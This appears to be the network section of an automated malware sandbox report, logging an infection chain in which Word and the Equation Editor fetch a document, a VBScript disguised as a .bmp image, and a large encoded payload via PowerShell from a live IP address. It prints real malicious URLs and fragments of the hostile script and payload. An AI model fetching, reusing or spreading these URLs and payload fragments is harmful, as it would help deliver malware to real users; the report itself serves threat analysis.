            May 27, 2024 09:00:31.129097939 CEST493INHTTP/1.1 301 Moved Permanently
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Location: http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc
            Date: Mon, 27 May 2024 07:00:26 GMT
            Vary: Accept-Encoding
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Content-Length: 108
            Connection: keep-alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.2249167198.46.178.154801668C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:31.137303114 CEST285OUTHEAD /100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: 198.46.178.154
            May 27, 2024 09:00:31.629596949 CEST321INHTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:31 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:45:40 GMT
            ETag: "89d4-61964d6254bf9"
            Accept-Ranges: bytes
            Content-Length: 35284
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword
            May 27, 2024 09:00:31.838633060 CEST321INHTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:31 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:45:40 GMT
            ETag: "89d4-61964d6254bf9"
            Accept-Ranges: bytes
            Content-Length: 35284
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword


            Session IDSource IPSource PortDestination IPDestination Port
            7192.168.2.224916854.241.153.19280
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:35.770804882 CEST123OUTOPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
            translate: f
            Host: z2.ink
            May 27, 2024 09:00:36.384897947 CEST1236INHTTP/1.1 404 Not Found
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Date: Mon, 27 May 2024 07:00:36 GMT
            Content-Length: 102317
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Connection: keep-alive
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
            May 27, 2024 09:00:36.384954929 CEST1236INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38
            Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;
            May 27, 2024 09:00:36.384989977 CEST1236INData Raw: 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57
            Data Ascii: play: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;fon
            May 27, 2024 09:00:36.385027885 CEST1236INData Raw: 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72
            Data Ascii: ce {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exg.woff) format('woff');}@fo
            May 27, 2024 09:00:36.385081053 CEST1236INData Raw: 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a
            Data Ascii: t-face {font-family: 'Open Sans';font-style: normal;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVQ.woff) format('woff');}@f
            May 27, 2024 09:00:36.385113955 CEST1236INData Raw: 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 33 3b 20 72 76 3a 33 39 2e 30 29 20 47 65 63 6b 6f 2f 32 30 31 30 30 31 30 31 20 46 69 72 65 66 6f 78 2f 33 39 2e 30 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f
            Data Ascii: Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126M
            May 27, 2024 09:00:36.385149956 CEST1236INData Raw: 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 30 5a 6a 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d
            Data Ascii: aGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk0ZjWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v3
            May 27, 2024 09:00:36.385200024 CEST1236INData Raw: 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 68 5a 31 78 34 75 61 56 49 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d 2f
            Data Ascii: SYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgshZ1x4uaVI.woff2) format('woff2');}/*...*/</style><style id=et-builder-googlefonts-cached-inline>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Monoton:regular&#038;subset=latin&
            May 27, 2024 09:00:36.385235071 CEST1236INData Raw: 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74
            Data Ascii: jqueryParams=[...jqueryParams,r],$};window.jQuery=jQuery,window.$=jQuery;let customHeadScripts=!1;jQuery.fn=jQuery.prototype={},$.fn=jQuery.prototype={},jQuery.noConflict=function(r){if(window.jQuery)return jQuery=window.jQuery,$=window.jQuer
            May 27, 2024 09:00:36.385271072 CEST1236INData Raw: 33 3a 33 36 3a 31 38 2b 30 30 3a 30 30 22 3e 3c 6d 65 74 61 0a 70 72 6f 70 65 72 74 79 3d 22 61 72 74 69 63 6c 65 3a 70 75 62 6c 69 73 68 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 33 2d 30 37 2d 30 36 54 30 33 3a 33 34 3a 32
            Data Ascii: 3:36:18+00:00"><metaproperty="article:published_time" content="2023-07-06T03:34:22+00:00"><metaproperty="article:modified_time" content="2023-07-06T03:36:18+00:00"><metaname="twitter:card" content="summary_large_image"><metaname="twitter:t
            May 27, 2024 09:00:36.392170906 CEST1236INData Raw: 22 3a 22 50 65 72 73 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 61 75 74 68 6f 72 2f 74 69 61 6e 71 69 22 2c 22 6e 61 6d 65 22 3a 22 74 69 61 6e 71 69 22 2c 22 75
            Data Ascii: ":"Person","@id":"https://face.linksgpt.com/edge/author/tianqi","name":"tianqi","url":"https://face.linksgpt.com/edge/author/tianqi","image":{"@type":"ImageObject","@id":"https://secure.gravatar.com/avatar/e10cce2f2dda5c2210772fe82fe758eb?s=96


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.224916954.241.153.192801668C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:37.485235929 CEST130OUTHEAD /nLNG HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: z2.ink
            Content-Length: 0
            Connection: Keep-Alive
            May 27, 2024 09:00:38.061413050 CEST493INHTTP/1.1 301 Moved Permanently
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Location: http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc
            Date: Mon, 27 May 2024 07:00:31 GMT
            Vary: Accept-Encoding
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Content-Length: 108
            Connection: keep-alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.2249170198.46.178.154801668C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:38.069988966 CEST304OUTHEAD /100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: 198.46.178.154
            Content-Length: 0
            Connection: Keep-Alive
            May 27, 2024 09:00:38.571190119 CEST321INHTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:38 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:45:40 GMT
            ETag: "89d4-61964d6254bf9"
            Accept-Ranges: bytes
            Content-Length: 35284
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            10192.168.2.2249171198.46.178.154803300C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:39.042370081 CEST341OUTGET /100500/lionsandtigerbeautifulpicture.bmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: 198.46.178.154
            Connection: Keep-Alive
            May 27, 2024 09:00:39.528614044 CEST1236INHTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:39 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:34:34 GMT
            ETag: "262a2-61964ae6c3bdc"
            Accept-Ranges: bytes
            Content-Length: 156322
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: image/bmp
            Data Raw: ff fe 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 57 00 4d 00 49 00 44 00 61 00 74 00 65 00 53 00 74 00 72 00 69 00 6e 00 67 00 54 00 6f 00 44 00 61 00 74 00 65 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 29 00 0d 00 0a 00 0d 00 0a 00 57 00 4d 00 49 00 44 00 61 00 74 00 65 00 53 00 74 00 72 00 69 00 6e 00 67 00 54 00 6f 00 44 00 61 00 74 00 65 00 20 00 3d 00 20 00 43 00 44 00 61 00 74 00 65 00 28 00 4d 00 69 00 64 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 35 00 2c 00 20 00 32 00 29 00 20 00 26 00 20 00 22 00 2f 00 22 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 4d 00 69 00 64 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 37 00 2c 00 20 00 32 00 29 00 20 00 26 00 20 00 22 00 2f 00 22 00 20 00 26 00 20 00 4c 00 65 00 66 00 74 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 34 00 29 00 20 00 5f 00 0d 00 0a 00 [TRUNCATED]
            Data Ascii: Function WMIDateStringToDate(dtmEventDate)WMIDateStringToDate = CDate(Mid(dtmEventDate, 5, 2) & "/" & _Mid(dtmEventDate, 7, 2) & "/" & Left(dtmEventDate, 4) _& " " & Mid (dtmEventDate, 9, 2) & ":" & _Mid(dtmEventDate, 11, 2) & ":" & Mid(dtmEventDate, _13, 2))End Function'////////////////////////////////////////////////////////////////////////////////////////'/////////////////////////////////////////////////////////////////////////////
            May 27, 2024 09:00:39.528637886 CEST224INData Raw: 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 67 00 65 00 74 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 28 00 73 00 74 00 72 00 53 00
            Data Ascii: ///////////Function getDescription(strSearch,cType)If foundSlUi <> True Then If cType <> "wmi" Then
            May 27, 2024 09:00:39.528695107 CEST1236INData Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 67 00 6c 00 6f 00 62 00 61 00 6c 00 50 00 6f 00 70 00 46 00 61 00 69 00 6c 00 75 00 72 00 65 00 20 00 22 00 73 00 6c 00 75 00 69 00 2e 00 65 00 78 00 65 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00
            Data Ascii: globalPopFailure "slui.exe not found.",True quitExit() End IfElse Set objScriptExec = torrean
            May 27, 2024 09:00:39.528742075 CEST1236INData Raw: 75 00 62 00 22 00 2c 00 20 00 22 00 2f 00 64 00 73 00 74 00 61 00 74 00 75 00 73 00 73 00 75 00 62 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 57 00 4d 00 49 00 20 00 6e 00 65 00
            Data Ascii: ub", "/dstatussub" connectWMI nevri,rabi,burlista,"" performLicAction prasme,"","" If prasme
            May 27, 2024 09:00:39.528759003 CEST1236INData Raw: 6d 00 4c 00 69 00 63 00 41 00 63 00 74 00 69 00 6f 00 6e 00 20 00 22 00 2f 00 67 00 61 00 72 00 6f 00 74 00 65 00 61 00 72 00 22 00 2c 00 22 00 22 00 2c 00 22 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00
            Data Ascii: mLicAction "/garotear","","" 'Display PID/MachineID for sub keys performLicAction "/dpid","",n
            May 27, 2024 09:00:39.528769016 CEST1236INData Raw: 63 00 74 00 69 00 6f 00 6e 00 20 00 50 00 6c 00 61 00 74 00 66 00 6f 00 72 00 6d 00 20 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 22 00 2c 00 6e 00 65 00 76 00 72 00 69 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00
            Data Ascii: ction Platform Service",nevri atacadas MSG_EVENT_1017,"carapira","1017","Office Software Protection Platform
            May 27, 2024 09:00:39.528783083 CEST1236INData Raw: 2d 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2d 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 2d 00 53 00 50 00 50 00 22 00 2c 00 6e 00 65 00 76 00 72 00 69 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00
            Data Ascii: -Windows-Security-SPP",nevri atacadas MSG_EVENT_8200,"carapira","1014","Microsoft-Windows-Security-SPP",nevri
            May 27, 2024 09:00:39.528794050 CEST1236INData Raw: 70 00 72 00 61 00 73 00 6d 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 43 00 61 00 73 00 65 00 20 00 22 00 2f 00 68 00 65 00 6c 00 70 00 22 00 2c 00 20 00 22 00 68 00 65 00 6c 00 70 00 22 00 2c 00 20 00 22 00 3f 00 22 00 2c 00 20 00 22 00 2f 00
            Data Ascii: prasme Case "/help", "help", "?", "/?", "/?" verifyFileExists currentDir & "ospp.htm" toiruno curre
            May 27, 2024 09:00:39.528846025 CEST1236INData Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 43 00 61 00 73 00 65 00 20 00 37 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 67 00 65 00 74 00 43 00 6f 00 6d 00
            Data Ascii: Case 7 getCommand = Left(prasme,6) Case 8 getCommand = Left(pras
            May 27, 2024 09:00:39.528860092 CEST108INData Raw: 63 00 65 00 28 00 70 00 72 00 61 00 73 00 6d 00 65 00 2c 00 67 00 65 00 74 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 20 00 26 00 20 00 22 00 3a 00 22 00 2c 00 22 00 22 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00
            Data Ascii: ce(prasme,getCommand & ":","") If str
            May 27, 2024 09:00:39.533737898 CEST1236INData Raw: 56 00 61 00 6c 00 75 00 65 00 20 00 3d 00 20 00 22 00 22 00 20 00 54 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 67 00 6c 00 6f 00 62 00
            Data Ascii: Value = "" Then globalPopFailure MSG_UNSUPPORTED & " A value is required for: " & prasme,True


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.2249175198.46.178.154803608C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:57.472821951 CEST78OUTGET /100500/HWE.txt HTTP/1.1
            Host: 198.46.178.154
            Connection: Keep-Alive
            May 27, 2024 09:00:57.974133968 CEST1236INHTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:57 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:32:16 GMT
            ETag: "a1000-61964a6360cf0"
            Accept-Ranges: bytes
            Content-Length: 659456
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/plain
            Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
            May 27, 2024 09:00:57.974200010 CEST224INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
            Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1
            May 27, 2024 09:00:57.974236012 CEST1236INData Raw: 41 55 4e 38 55 44 4f 31 67 53 4e 6b 55 44 46 30 77 50 4e 30 54 44 38 30 77 4f 4e 6f 54 44 32 30 51 4e 4e 45 54 44 72 30 51 4b 4e 67 53 44 6e 30 77 49 4e 49 53 44 65 30 41 47 4e 59 52 44 56 30 51 45 4e 41 52 44 4d 30 67 42 4e 51 51 44 44 7a 77 2f
            Data Ascii: AUN8UDO1gSNkUDF0wPN0TD80wONoTD20QNNETDr0QKNgSDn0wINISDe0AGNYRDV0QENARDM0gBNQQDDzw/M4PD4zw9MYPD1zA8M4ODtAAQAgBgBQDQOYkDFAAAAMAgBADAAA0D4AAAAMAgBwCAOgjD24QIOAiDf4gEOogDB3w+NofD23A8NIeDe3w1NYdDO3QzNwcDLAAAAwAgBQCgNwYDL1AbNsWDq1QaNgWDn1gZNMWDi1QYN
            May 27, 2024 09:00:57.974335909 CEST1236INData Raw: 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44
            Data Ascii: mDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD72QuNcbD1
            May 27, 2024 09:00:57.974370956 CEST1236INData Raw: 77 6d 4f 6f 70 44 5a 36 41 6d 4f 63 70 44 57 36 51 6c 4f 51 70 44 54 36 67 6b 4f 45 70 44 51 36 77 6a 4f 34 6f 44 4e 36 41 6a 4f 73 6f 44 4b 36 51 69 4f 67 6f 44 48 36 67 68 4f 55 6f 44 45 36 77 67 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66
